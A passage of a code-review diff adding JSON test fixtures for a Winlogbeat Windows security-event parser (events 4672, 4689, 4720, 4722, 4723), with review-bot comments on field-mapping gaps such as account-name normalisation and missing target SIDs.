"0x40c158b6", + "SubjectUserName": "USER01-WIN$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "11111111-aaaa-2222-bbbb-333333333333", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "USER01-WIN.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "USER01-WIN" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "USER01-WIN" + }, + "winlog": { + "activity_id": "{abcdefab-1234-cdef-5678-901234abcdef}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "USER01-WIN.domain.priv", + "event_id": "4672", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0x40c158b6" + }, + "opcode": "Informations", + "process": { + "pid": 828, + "thread": { + "id": 27812 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "288206963", + "task": "Special Logon" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4689.json b/Beats/winlogbeat/tests/security_event_4689.json new file mode 100644 index 000000000..e5beffcf5 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4689.json 
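Review bot: `user.name` is pinned as `USER01-WIN`, i.e. the trailing `$` of `SubjectUserName` `USER01-WIN$` is stripped (the 4689 fixture does the same with `ACCOUNT_01$`), whereas the 4625 expectation earlier in this patch keeps `"name": "WORKSTATION$"`; the same computer account therefore has two spellings across event IDs in one intake, and a correlation on `user.name` between a 4625 and a 4672 from the same host will not match. Either normalisation is defensible, but it should be one rule for every security event and the fixtures should pin that single rule. Separately, `PrivilegeList` is kept only as one tab/newline-delimited string under `action.properties`, so a rule that looks for a single privilege in the list must substring-match across `\n\t\t\t`; pinning an array of privilege names would make that field directly filterable.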
@@ -0,0 +1,88 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}" + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin 
:\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", + "event": { + "action": "Process Termination", + "code": "4689", + "kind": "event", + "module": "security", + "original": "Un processus est termin\u00e9.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT_01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x3E7\n\nInformations sur le processus :\n\tID du processus :\t0x1df8\n\tNom du processus :\tC:\\Windows\\System32\\process.exe\n\t\u00c9tat de fin :\t0x0", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:10:13.534000Z", + "action": { + "id": 4689, + "outcome": "success", + "properties": { + "ProcessId": "0x1df8", + "ProcessName": "C:\\Windows\\System32\\process.exe", + "Status": "0x0", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "ACCOUNT_01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": 
"winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "ACCOUNT_01.domain.priv" + }, + "log": { + "level": "information" + }, + "process": { + "executable": "C:\\Windows\\System32\\process.exe", + "name": "process.exe", + "pid": 7672 + }, + "related": { + "user": [ + "ACCOUNT_01" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACCOUNT_01" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACCOUNT_01.domain.priv", + "event_id": "4689", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Informations", + "process": { + "pid": 4, + "thread": { + "id": 620 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1564712", + "task": "Process Termination" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4720.json b/Beats/winlogbeat/tests/security_event_4720.json new file mode 100644 index 000000000..96e08b538 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4720.json 
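Review bot: The expectation pins no `event.category`/`event.type` and no `process.exit_code` for this process-termination event, while `event_data.Status` is `0x0` and the 4625 expectation earlier in this patch does set `event.type: ["start"]`; if the parser is meant to be ECS-complete for process events, the expected block should read `"process": {"executable": "C:\\Windows\\System32\\process.exe", "exit_code": 0, "name": "process.exe", "pid": 7672}` with `"category": ["process"]` and `"type": ["end"]` under `event`, so that start and end events can be paired on the same category. The conversion of `ProcessId` `0x1df8` to `process.pid` 7672 is correct and is the useful assertion this fixture adds; it would be worth a short comment in the parser that `ProcessId` is hexadecimal while `winlog.process.pid` is already decimal, since the two differ here (4 vs 7672).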
@@ -0,0 +1,127 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":
612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}" + }, + "expected": { + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD 
Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", + "event": { + "action": "added-user-account", + "category": [ + "iam" + ], + "code": "4720", + "kind": "event", + "module": "security", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "type": [ + "creation", + "user" + ] + }, + "@timestamp": "2024-11-12T04:47:02.389000Z", + "action": { + "id": 4720, + "outcome": "success", + "properties": { + "AccountExpires": "%%1794", + "AllowedToDelegateTo": "-", + "DisplayName": "-", + "HomeDirectory": "-", + "HomePath": "-", + "LogonHours": "%%1793", + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "NewUacValue": "0x214", + "OldUacValue": 
"0x0", + "PasswordLastSet": "%%1794", + "PrimaryGroupId": "513", + "PrivilegeList": "-", + "ProfilePath": "-", + "SamAccountName": "USER", + "ScriptPath": "-", + "SidHistory": "-", + "SubjectDomainName": "RESEAU-COMPANY", + "SubjectLogonId": "0x2a4b2040", + "SubjectUserName": "user-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "RESEAU-COMPANY", + "TargetSid": "S-1-2-3-4-5-6-7", + "TargetUserName": "USER", + "UserAccountControl": [ + "2082", + "2084", + "2089" + ], + "UserParameters": "-", + "UserPrincipalName": "USER@reseau.company", + "UserWorkstations": "-" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "name": "AGENT", + "type": "winlogbeat", + "version": "7.12.1" + }, + "host": { + "name": "HOST01.reseau.company" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "user-name" + ] + }, + "user": { + "domain": "RESEAU-COMPANY", + "id": "S-1-2-3", + "name": "user-name" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.reseau.company", + "event_data": { + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "UserAccountControl": [ + "2082", + "2084", + "2089" + ] + }, + "event_id": "4720", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x2a4b2040" + }, + "opcode": "Info", + "process": { + "pid": 612, + "thread": { + "id": 1940 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "479720536", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4722.json b/Beats/winlogbeat/tests/security_event_4722.json new file mode 100644 index 000000000..94bd16fdf --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4722.json 
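Review bot: The expected output never surfaces the account that was created: `TargetUserName`, `TargetDomainName` and `TargetSid` stay buried in `action.properties`, there is no `user.target` block (the 4722, 4723 and 4725 fixtures in this same patch do emit one), and `related.user` keeps only the subject `user-name` even though the raw input's own `related.user` listed `USER` as well. For a 4720 event the new account is the value analysts pivot on, so as written this fixture pins a parser gap rather than the intended mapping. I would expect the `user` object to also contain `"target": { "domain": "RESEAU-COMPANY", "id": "S-1-2-3-4-5-6-7", "name": "USER" }` and `related.user` to list `USER`; presumably that means the 4720 branch of the parser needs the same Target* handling as 4722 before this expected block is regenerated.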
@@ -0,0 +1,111 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount 
Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4722", + "kind": "event", + "module": "security", + "original": "A user account was enabled.\n\nSubject:\n\tSecurity 
ID:\t\tS-1-2-3\n\tAccount Name:\t\taccount-name\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A13C3FC\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACC_NAME\n\tAccount Domain:\t\tDOMAIN", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:53:57.535000Z", + "action": { + "id": 4722, + "outcome": "success", + "properties": { + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x4a13c3fc", + "SubjectUserName": "account-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3-4-5", + "TargetUserName": "ACC_NAME" + } + }, + "agent": { + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333", + "id": "12345678-abcd-90ef-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "AA-BB-CC-DD-EE-FF" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account-name" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "account-name", + "target": { + "domain": "DOMAIN", + "name": "ACC_NAME" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4722", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x4a13c3fc" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13042939152", + "task": 
"User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4723.json b/Beats/winlogbeat/tests/security_event_4723.json new file mode 100644 index 000000000..34874fdfb --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4723.json 
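Review bot: `user.target` carries `domain` and `name` but no `id`, although the target SID is available as `action.properties.TargetSid` (`S-1-2-3-4-5`) and the subject does get `user.id` from `SubjectUserSid`. The SID is the stable identifier when an account is renamed, so correlating enable/disable/password-change events by name alone is fragile; I would expect `"id": "S-1-2-3-4-5"` inside the `target` block. The same omission is in the 4723 fixture (`TargetSid` `S-1-2-3`) and the 4725 fixture (`TargetSid` `S-4-5-6`) added by this patch. If the parser does not currently map TargetSid to `user.target.id`, this is a parser change first and a fixture regeneration second.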
@@ -0,0 +1,112 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional 